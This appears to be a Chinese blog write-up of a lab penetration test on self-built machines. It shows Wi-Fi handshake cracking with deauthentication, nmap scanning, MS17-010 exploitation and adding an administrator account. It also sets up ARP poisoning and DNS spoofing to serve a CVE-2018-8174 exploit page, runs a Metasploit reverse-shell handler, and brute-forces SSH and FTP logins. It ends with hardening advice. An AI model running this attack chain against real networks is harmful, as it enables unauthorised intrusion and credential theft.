测试目的:通过WIFI渗透到内网,并对内网进行扫描,收集设备信息,并尽可能的拿到多的权限。
测试设备:两台笔记本电脑 :PC1, PC2 ; 一个USB无线网卡RT5572; 一个无线AP
测试环境:PC1 WIN10系统,安装虚拟机KALI,桥接上网。利用USB无线网卡**目标网络的WIFI密码,连接到内部网络。
获取到IP址:
宿主机PC1 IP:10.10.10.103
KALI IP: 10.10.10.110。
宿主机PC2 WIN7系统,安装两个虚拟机WIN7和RHEL7作为测试目标,桥接上网。
PC2:10.10.10.104;WIN7:10.10.10.109;RHEL7:10.10.10.101。

测试架构:
通过WIFI渗透到内网服务器和主机

一、**目标网络WIFI密码,进入内网。
1、 将网卡连接到KALI,通过ifconfig命令查到无线网卡信息。
若ifconfig 看不到无线网卡信息,用ifconfig –a 查看到无线网卡名称,并用ifconfig wlan0mon up启用无线网卡。
通过WIFI渗透到内网服务器和主机

2、 将无线网卡设为监听模式:
通过WIFI渗透到内网服务器和主机

3、 通过无线网卡扫描周围WIFI信息:
-w 指定扫描结果保存的目录及文件名
airodump-ng -w test wlan0mon通过WIFI渗透到内网服务器和主机

4、扫描到目的WIFI Guest_6321,记录信道CH,BSSID和ESSID对目标网络进行抓包,并将保存到当前目录,保存文件名pak,-c指定信道,–bssid 指定AP的MAC即BSSID
airodump-ng -c 2 --bssid apmac -w pak wlan0mon
通过WIFI渗透到内网服务器和主机

5、 为了抓取到更多的握手包,对AP和Client进行攻击,强制Client下线重连:
-0 5是断开连接攻击5次,
-a 是AP MAC
–c 是Client MAC
通过WIFI渗透到内网服务器和主机

6、 抓包一定时间后,对握手包加载密码进行暴力**:
-w加载密码包
aricrack-ng -w pass.txt pak-01.cap
通过WIFI渗透到内网服务器和主机
获取到密码:7890123456

7、 通过**的密码连接到目标网络:
通过WIFI渗透到内网服务器和主机

二、对内网进行信息收集
1、扫描内网存活主机:
利用arp_sweep扫描存活主机
通过WIFI渗透到内网服务器和主机

2、利用NMAP进行扫描,获取详细信息。
a、网关为Fast的无线路由器。
通过WIFI渗透到内网服务器和主机

忽略中间的内容
通过WIFI渗透到内网服务器和主机

b、10.10.10.101为RHEL的服务器,开放了80,21和22端口。
通过WIFI渗透到内网服务器和主机

c、10.10.10.109为WIN7系统。开启了共享服务。
通过WIFI渗透到内网服务器和主机

三、利用Metasploit对网络主机WIN7进行渗透测试
1、对WIN7漏洞扫描分析,发现存在MS17-010漏洞:
通过WIFI渗透到内网服务器和主机

2、利用漏洞拿到shell:
通过WIFI渗透到内网服务器和主机

查看用户信息,成功添加用户并将用户加到管理员组

通过WIFI渗透到内网服务器和主机

四、利KALI自带的工具ettercap,通过ARP毒化和DNS欺骗,再利用CVE-2018-8174_EXP制作后门程式生成恶意 html文件拿到WIN7的shell

1、 先将KALI开启Apache服务并将转发模式开启:
apache开启: systemctl start httpd
转发模式开启:
通过WIFI渗透到内网服务器和主机

2、修改ettercap的DNS A记录,将所有的.com的域名都解析到kali
通过WIFI渗透到内网服务器和主机

3、利用CVE-2018-8174_EXP制作后门程式生成恶意 html 文件(漏洞适用的低版本的IE)
python CVE-2018-8174.py –u http://10.10.10.110/exploit.html -o baidu.rtf -i 110.10.10.110 -p 4444
将文件拷贝到/var/www/html 下面并改名为index.html
通过WIFI渗透到内网服务器和主机

4、运行msfconsole 并开启监听状态:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.10.110
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > exploit

以上准备工作已完成,下面开始对目标主机进行ARP 毒化和DNS欺骗。
利用kali自带的工具ettercap
5、开启图形化操作界面:ettercap -G

6、对内网主机进行扫描嗅探
Sniff —unified sniffing 选择自己用的网卡,点OK
通过WIFI渗透到内网服务器和主机

7、开始主机扫描
通过WIFI渗透到内网服务器和主机

8、完成后,查看主机列表。在主机列表分别选中网关IP和目标主机IP加入到target1 和 target2
通过WIFI渗透到内网服务器和主机

9、开启ARP 毒化:Mitm—ARP poisoning
通过WIFI渗透到内网服务器和主机

10、在插件里面启动DNS spoof 进行DNS欺骗
通过WIFI渗透到内网服务器和主机

11、开启抓包
通过WIFI渗透到内网服务器和主机

12、检查目标主机的ARP表,网关的MAC地址和Kali的一样了
通过WIFI渗透到内网服务器和主机

13、目标主机访问www.baidu.com, 会跳转到制作的后门连接
通过WIFI渗透到内网服务器和主机

14、kali监控端反弹到shell
通过WIFI渗透到内网服务器和主机

五、对RHEL进行测试:
RHEL服务器通过扫描发现开启了 21 、22、80端口,分别进行测试
1、访问80端口,为WEB服务器(没有搭正式的服务)
通过WIFI渗透到内网服务器和主机

2、利用Metasploit加载字典尝试**ssh密码:
通过WIFI渗透到内网服务器和主机

禁止空密码登陆
通过WIFI渗透到内网服务器和主机

加载用户名和密码文件:
通过WIFI渗透到内网服务器和主机

成功**用户名和密码:root: 123456
通过WIFI渗透到内网服务器和主机

通过用户名和密码登陆到后台:
通过WIFI渗透到内网服务器和主机

3、加载字典尝试**ftp登陆密码:
通过WIFI渗透到内网服务器和主机

成功**ftp用户名和密码 team1:123456,连接FTP服务器并下载文件:

通过WIFI渗透到内网服务器和主机
六、改善措施

1、增强WIFI密码强度管理,并定期更改
2、及时修复系统漏洞和应用软件漏洞
3、关闭不必要的服务
4、限制服务器ssh、ftp的登陆权限,增加密码强度,有条件的可以用**登陆或只允许固定地址的用户登陆。

相关文章:

  • 2022-12-23
  • 2021-11-18
  • 2021-12-23
  • 2021-11-18
  • 2022-12-23
  • 2021-11-19
猜你喜欢
  • 2021-11-18
  • 2021-11-18
  • 2021-09-01
  • 2021-11-01
  • 2022-12-23
  • 2021-12-04
相关资源
相似解决方案